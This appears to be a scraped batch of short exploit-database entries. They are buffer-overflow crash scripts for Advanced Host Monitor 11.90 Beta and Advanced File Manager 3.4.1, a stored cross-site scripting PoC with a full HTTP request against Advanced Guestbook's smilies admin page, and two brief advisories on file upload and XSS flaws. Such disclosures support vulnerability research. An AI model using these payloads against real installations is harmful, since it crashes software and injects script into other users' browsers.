# Software Link : https://www.ks-soft.net/download/hm1190.exe
# Tested Version: 11.90 Beta
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash: 
# 1.- Run python code : python Advanced_Host_Monitor_11.90_Beta.py
# 2.- Open Advanced_Host_Monitor_11.90_Beta.txt and copy content to clipboard
# 3.- Open HostMonitor
# 4.- Help -> License...
# 5.- Register Now
# 6.- Name (Organization): -> l4m5
# 7.- Paste ClipBoard on "Registration number:"
# 8.- OK
# 9.- Crashed

#!/usr/bin/env python
 
buffer = "\x41" * 1050
f = open ("Advanced_Host_Monitor_11.90_Beta.txt", "w")
f.write(buffer)
f.close()
HireHackking 
# Exploit Title: Advanced Guestbook 2.4.4 - 'Smilies' Persistent Cross-Site Scripting (XSS)
# Date: 17/08/2021
# Exploit Author: Abdulkadir AYDOGAN
# Vendor Homepage: https://www.ampps.com/apps/guestbooks/Advanced_Guestbook
# Software Link: https://www.ampps.com/apps/guestbooks/Advanced_Guestbook
# Version: 2.4.4

Advanced Guestbook is a free open source guestbook script developed in PHP.
Examples of features include email notifications, uploading pictures, html
tags handling, multiple polls, comments and themes.

#Description
The following is PoC to use the XSS bug with authorized user.

Firstly there are four part of a emotion object which is :

- Emotion icon
- Emotion file name
- Emotion command which will be used to call this object (s_code)
- Emotion description (s_emotion)

Here is the exploitation steps for vulnerability:

1. Login to your admin account.
2. Go to "Smilies" tab to view and edit emotion icons
3. Click "edit" text in the "Action" column to edit emotions
4. Change emotion description to Javascript code
5. Click the "Submit Settings"
6. Click "Smilies" tab again to view all emotions and Javascript code will
be executed

# Vulnerable Parameter Type: POST
# Vulnerable Parameter: s_emotion
# Attack Pattern: <script>alert("Smile more!")</script>

#PoC
HTTP Request:

POST /advancedguestbook/admin.php HTTP/1.1
Host: HOST_ADDRESS
Content-Length: 175
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://HOST_ADDRESS
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer:
http://HOST_ADDRESS/advancedguestbook/admin.php?action=smilies&session=17395de9919fffa0ac9476370c2c7ba0&uid=1&edit_smilie=7
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: _ga=GA1.2.2068746825.1621203842; _gid=GA1.2.1432458757.1621203842;
_gat=1
Connection: close

s_code=:cool:&s_emotion=<script>alert("Smile
more!")</script>&edit_smilie=7&uid=1&session=17395de9919fffa0ac9476370c2c7ba0&action=smilies&add_smilies=1
HireHackking 
source: https://www.securityfocus.com/bid/61735/info

Advanced Guestbook is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

Advanced Guestbook 2.4.3 is vulnerable; other versions may also be affected. 

http://www.example.com.tw/guestbook/addentry.php
HireHackking 
# Exploit Title: Advanced File Manager v3.4.1 - Denial of Service (PoC)
# Discovery by: Rafael Pedrero
# Discovery Date: 2019-01-30
# Vendor Homepage: http://www.advexsoft.com
# Software Link : http://www.advexsoft.com
# Tested Version: 3.4.1
# Tested on: Windows XP SP3
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow

# Steps to Produce the Crash:
# 1.- Run af_mgr.exe
# 2.- copy content af_mgr_Crash.txt or 300 "A" to clipboard (result from this python script)
# 3.- Go to Help - Enter registration code and paste the result in all fields: "Person", "Organization", "E-mail" and "Enter your registration key below, please:"
# 4.- Click in Register button and you will see a crash.

#!/usr/bin/env python

crash = "\x41" * 300
f = open ("af_mgr_Crash.txt", "w")
f.write(crash)
f.close()
HireHackking 
source: https://www.securityfocus.com/bid/51339/info

Advanced File Management is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Advanced File Management 1.4 is vulnerable; other versions may also be affected. 

http://www.example.com/users.php?page=[xss]